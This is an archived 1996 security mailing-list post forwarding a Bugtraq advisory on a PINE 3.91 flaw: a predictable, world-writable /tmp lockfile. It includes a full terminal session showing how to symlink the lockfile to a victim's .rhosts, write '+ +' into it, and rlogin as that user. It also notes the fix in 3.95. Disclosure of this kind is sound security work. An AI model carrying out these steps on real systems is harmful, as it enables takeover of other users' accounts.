From proff  Wed Sep 18 00:33:37 1996
Received: (proff@localhost) by suburbia.net (8.7.4/Proff-950810) id AAA15735 for best-of-security; Wed, 18 Sep 1996 00:33:36 +1000
From: Julian Assange <proff>
Message-Id: <199609171433.AAA15735@suburbia.net>
Subject: [linux-security] [BUG] Vulnerability in PINE
To: best-of-security
Date: Wed, 18 Sep 1996 00:33:35 +1000 (EST)
Approved: proff@suburbia.net
X-Mailer: ELM [version 2.4 PL23]
Content-Type: text

Forwarded message:
From best-of-security-request@suburbia.net  Wed Sep 18 00:24:28 1996
X-Envelope-From: slogic@lightning.netcore.com.au  Wed Sep 18 00:24:14 1996
From: Tech-Manip <slogic@lightning.netcore.com.au>
Message-Id: <199609172007.QAA11350@lightning.netcore.com.au>
Subject: [linux-security] [BUG] Vulnerability in PINE (fwd)
To: best-of-security@suburbia.net
Date: Tue, 17 Sep 1996 16:07:49 -0400 (EDT)
X-Mailer: ELM [version 2.4 PL24]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit


- Not sure if i have already sent this one, so here it is anyway.

- Greg.



Forwarded message:
> From owner-linux-security@tarsier.cv.nrao.edu Tue Sep 17 15:05:40 1996
> Resent-Date: Mon, 16 Sep 1996 12:31:19 -0400
> Resent-From: Jeff Uphoff <juphoff@tarsier.cv.nrao.edu>
> Resent-Message-Id: <199609161631.MAA08586@tarsier.cv.nrao.edu>
> Resent-To: linux-security@tarsier.cv.nrao.edu
> MIME-Version: 1.0
> Content-Type: TEXT/PLAIN; charset=US-ASCII
> Message-ID: <Pine.LNX.3.95.960826192918.1836B-100000@litterbox.org>
> X-cc:         New Hack City Projects <project@newhackcity.net>,
>               Raven <raven@raven.cybercom.net>, Bill Arcand <bill@demtech.com>,
>               "(d)(M)(v)" <dmv@shore.net>
> From: "Sean B. Hamor" <hamors@litterbox.org>
> To: Multiple recipients of list BUGTRAQ <BUGTRAQ@netspace.org>
> Subject: [linux-security] [BUG] Vulnerability in PINE
> Date: 	Mon, 26 Aug 1996 19:35:05 -0400
> X-Mailer: VM 5.95 (beta); GNU Emacs 19.29.1
> X-Attribution: Up
> Sender: owner-linux-security@tarsier.cv.nrao.edu
> Precedence: list
> 
> [Mod: Forwarded from Bugtraq.  --Jeff.]
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> 
>                                                        Monday, August 26, 1996
>                                                                  The Litterbox
>                                                                  Sean B. Hamor
> 
> Note:
> 
>   I'm not sure whether or not information this has been previously released.
>   I found this earlier this evening while poking around, and apologize if
>   I've just found an old bug.
> 
>   I verified the existence of this bug in PINE 3.91, however it had been
>   fixed in 3.95.  I don't know if 3.92, 3.93, or 3.94 are effected.  Even
>   though this bug has been fixed, I thought I'd still release this because
>   many Linux installations still use PINE 3.91, and most machines I have
>   accounts on still use PINE 3.91.
> 
> 
> Synopsis:
> 
>   A problem exists in PINE where the name used for the lockfile in /tmp/ is
>   easily guessable.  From various testing on a few machines, the name of the
>   lockfile is static for each user who launches PINE.  Note that the
>   lockfile is only created when there is new mail in the user's INBOX.
> 
>   This wouldn't normally be a problem, however this lockfile is created mode
>   666 in /tmp/.  The static lockfile name can be easily attained by doing an
>   ls in /tmp/ when it has been determined that the user is running PINE and
>   has new email.
> 
> 
> Exploit:
> 
>   By watching the process table with ps to see which users are running PINE,
>   one can then do an ls in /tmp/ to gather the lockfile names for each user.
>   Watching the process table once again will now reveal when each user quits
>   PINE or runs out of unread messages in their INBOX, effectively deleting
>   the respective lockfile.
> 
>   Creating a symbolic link from /tmp/.hamors_lockfile to ~hamors/.rhosts
>   (for a generic example) will cause PINE to create ~hamors/.rhosts as a 666
>   file with PINE's process id as its contents.  One may now simply do an
>   echo "+ +" > /tmp/.hamors_lockfile, then rm /tmp/.hamors_lockfile.
> 
>   For this example, hamors is the victim while catluvr is the attacker:
> 
> hamors (21 19:04) litterbox:~> pine
> 
> catluvr (6 19:06) litterbox:~> ps -aux | grep pine
> catluvr   1739  0.0  1.8  100  356 pp3 S    19:07   0:00 grep pine
> hamors    1732  0.8  5.7  249 1104 pp2 S    19:05   0:00 pine
> 
> catluvr (7 19:07) litterbox:~> ls -al /tmp/ | grep hamors
> - -rw-rw-rw-   1 hamors   elite           4 Aug 26 19:05 .302.f5a4
> 
> catluvr (8 19:07) litterbox:~> ps -aux | grep pine
> catluvr   1744  0.0  1.8  100  356 pp3 S    19:08   0:00 grep pine
> 
> catluvr (9 19:09) litterbox:~> ln -s /home/hamors/.rhosts /tmp/.302.f5a4
> 
> hamors (23 19:09) litterbox:~> pine
> 
> catluvr (11 19:10) litterbox:~> ps -aux | grep pine
> catluvr   1759  0.0  1.8  100  356 pp3 S    19:11   0:00 grep pine
> hamors    1756  2.7  5.1  226  992 pp2 S    19:10   0:00 pine
> 
> catluvr (12 19:11) litterbox:~> echo "+ +" > /tmp/.302.f5a4
> 
> catluvr (13 19:12) litterbox:~> cat /tmp/.302.f5a4
> + +
> 
> catluvr (14 19:12) litterbox:~> rm /tmp/.302.f5a4
> 
> catluvr (15 19:14) litterbox:~> rlogin litterbox.org -l hamors
> 
> Verification:
> 
> This vulnerability has been tested on the following platforms with the
> following versions of PINE:
> 
>   Linux Slackware 3.0 (1.2.13):  PINE 3.91
>   FreeBSD 2.1.0-RELEASE:  PINE 3.91
> 
>   Problem has been fixed in PINE 3.95 under Linux Slackware 3.0 (1.2.13):
> 
>   Log entry:
>   Aug 26 19:10:58 litterbox syslog: SECURITY PROBLEM: lock file /tmp/.302.f5a4 is a symbolic link
> 
>   User warning:
>   [SECURITY ALERT: symbolic link on lock name!]
>   [Can't open mailbox lock, access is readonly]
> 
> EOF
> 
> Finger hamors@ishiboo.com           /\_/\          mailto:hamors@litterbox.org
> for PGP public key block.          ( o.o )     http://www.ishiboo.com/~hamors/
> alt.litterbox, The Home of TOCA     > ^ <    http://www.litterbox.org/~hamors/
>  Hi!  I'm a .signature virus!  Add me to your .signature and join in the fun!
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
> 
> iQEVAwUBMiI0rjU6HlxZIJ+FAQES9Qf/UYcqT/L9iEVwre6MS0Uokaw7npEqM8iZ
> zFZF5KLBGFOSCE36V+2VG2/7rhR24Q4J9A51VyaCC3kzQyS++wr5IqaBl9AGxpIG
> zSk2APmUnyi5NmUYoRnRIwFP8ptg15Bz3syxqsLegPYJdZW1r7DeA4rG47xi0lgG
> abNNfDta1PQYbxRh+C6yQ9ey6p31/o59CDackH/ene9brqqQXZBrt/fnn4SnNHiP
> EQyjcwkyTkFHkCQmfCmT1zJzlVfF6sj36der7boIsu9EAFsqpSwzI1/zZCvFgzoZ
> kpH4/srgo3tIFOcTFSoescJQE+wynwMK45Ab0VYjpPAvOBwqld6hyg==
> =hejk
> -----END PGP SIGNATURE-----
> 

--
slogic@netcore.com.au


-- 
"Of all tyrannies a tyranny sincerely  exercised for the good of its victims  
 may be the most  oppressive.  It may be better to live under  robber barons  
 than  under  omnipotent  moral busybodies,  The robber baron's  cruelty may  
 sometimes sleep,  his cupidity may at some point be satiated; but those who  
 torment us for own good  will torment us  without end,  for they do so with 
 the approval of their own conscience."    -   C.S. Lewis, _God in the Dock_ 
+---------------------+--------------------+----------------------------------+
|Julian Assange RSO   | PO Box 2031 BARKER | Secret Analytic Guy Union        |
|proff@suburbia.net   | VIC 3122 AUSTRALIA | finger for PGP key hash ID =     |
|proff@gnu.ai.mit.edu | FAX +61-3-98199066 | 0619737CCC143F6DEA73E27378933690 |
+---------------------+--------------------+----------------------------------+